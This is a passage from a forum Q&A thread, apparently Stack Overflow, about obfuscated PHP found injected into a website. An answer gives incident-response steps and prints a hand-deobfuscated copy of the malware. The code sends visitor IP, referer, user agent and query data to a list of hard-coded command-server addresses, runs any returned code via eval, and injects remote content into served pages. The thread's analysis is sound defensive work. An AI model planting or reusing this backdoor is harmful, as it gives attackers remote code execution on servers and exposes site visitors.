                            $father2[] = "95.211.18.79";
                            shuffle($father2);
                            foreach($father2 as $ur){
                                if ( ahfudflfzdhfhs($ur) ) { break ;}
                            }
}


?>
```

Answer (score -1):

To expand on my comment...

Are you using a CMS (Wordpress, Joomla, etc.)? If so, some 3rd party plugin and theme developers attempt to encrypt their code so that it isn't pirated...

If you wrote the site from scratch, look down.

Are you the only developer?

(YES) --> You've been hacked. --> Check your log files. -> Look for unusual activity/hack attempts. --> Attempt to find the vulnerability and patch it. --> Remove the malicious code.

(NO) --> Ask the other developer(s) if they put it there. If the answer is no, go to the above solution.

As Khan said, time is of the essence to a certain extent, because services like Google and Web of Trust will begin to mark your site as malicious. At the same time, don't just delete the foreign code. If you manage to unravel it at a later date, you may be able to figure out what it does and who it reports to --> who the hackers are.

Also look at the server logs... If your server has been rooted, then the only way to keep the hacker out would be to reinstall it.

The code is:

```
if (!function_exists("GetMama"))
{ 
    function mod_con($buf){
        str_ireplace("","",$buf,$cnt_h);

        if ($cnt_h == 1) {
            $buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf); 
            return $buf;
        }

        str_ireplace("","",$buf,$cnt_h);
        if ($cnt_h == 1) {
            $buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf);
            return $buf;
        }

        return $buf;
    }

    function opanki($buf){
        $gz_e = false;$h_l = headers_list();

        if (in_array("Content-Encoding: gzip", $h_l)) {
            $gz_e = true;
        }

        if ($gz_e){
            $tmpfname = tempnam("/tmp", "FOO");
            file_put_contents($tmpfname, $buf);
            $zd = gzopen($tmpfname, "r");
            $contents = gzread($zd, 10000000);
            $contents = mod_con($contents);
            gzclose($zd);
            unlink($tmpfname);
            $contents = gzencode($contents);
        } 

        else {
            $contents = mod_con($buf);
        }

        $len = strlen($contents);
        header("Content-Length: ".$len);
        return($contents);
    } 

    function GetMama(){
        $mother = "mdrmediagroup.com";
        return $mother;
    }

    ob_start("opanki");

    function ahfudflfzdhfhs($pa){
        $mama = GetMama();
        $file = urlencode(FILE);

        if (isset($_SERVER["HTTP_HOST"])){
            $host = $_SERVER["HTTP_HOST"];
        } else {
            $host = "";
        }

        if (isset($_SERVER["REMOTE_ADDR"])){
            $ip = $_SERVER["REMOTE_ADDR"];
        } 

        else {
            $ip = "";
        }

        if (isset($_SERVER["HTTP_REFERER"])){
            $ref = urlencode($_SERVER["HTTP_REFERER"]);
        } 

        else {
            $ref = "";
        }

        if (isset($_SERVER["HTTP_USER_AGENT"])){
            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
        } 

        else {
            $ua = "";
        }

        if (isset($_SERVER["QUERY_STRING"])){
            $qs = urlencode($_SERVER["QUERY_STRING"]);
        } 

        else {
            $qs = "";
        }

        $url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;

        $try = true;

        if( function_exists("curl_init") ){

            $ch = curl_init($url_0 . $url_1);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 3);
            $ult = trim(curl_exec($ch));
            $try = false;
        } 

        if ((ini_get("allow_url_fopen")) && $try) {
            $ult = trim(@file_get_contents($url_0 . $url_1));
            $try = false;
        }

        if($try){
            $fp = fsockopen($pa, 80, $errno, $errstr, 30);

            if ($fp) {
                $out = "GET $url_1 HTTP/1.0\r\n";
                $out .= "Host: $pa\r\n";
                $out .= "Connection: Close\r\n\r\n";
                fwrite($fp, $out);
                $ret = "";

                while (!feof($fp)) {
                    $ret .= fgets($fp, 128);
                }

                fclose($fp);

                $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
            }

        } 

        if (strpos($ult,"eval") !== false){
            $z = stripslashes(str_replace("eval","",$ult)); e
            val($z); 
            exit();
        }

        if (strpos($ult,"ebna") !== false){
            $_SERVER["good"] = str_replace("ebna","",$ult);
            return true;
        }

        else {
            return false;
        }

    }

    $father2[] = "77.81.241.253";
    $father2[] = "46.249.58.135";
    $father2[] = "176.9.241.150";
    $father2[] = "46.37.169.56";
    $father2[] = "94.242.255.35";
    $father2[] = "178.162.129.223";
    $father2[] = "31.184.234.96";
    $father2[] = "77.95.18.189";
    $father2[] = "93.170.137.22";
    $father2[] = "188.40.95.244";
    $father2[] = "199.115.231.58";
    $father2[] = "82.192.87.178";
    $father2[] = "216.246.99.215";
    $father2[] = "95.211.18.79";

    shuffle($father2);

    foreach($father2 as $ur){
        if ( ahfudflfzdhfhs($ur) ) {
            break ;
        }
    }
}
```

Unpacked by hand so its more readable :)

Comment: Not 100% true. If he's using a CMS such as Wordpress, Joomla Drupla etc., sometimes 3rd party module developers try and hide their code like this...

Comment: I realized and apologized in the comments above.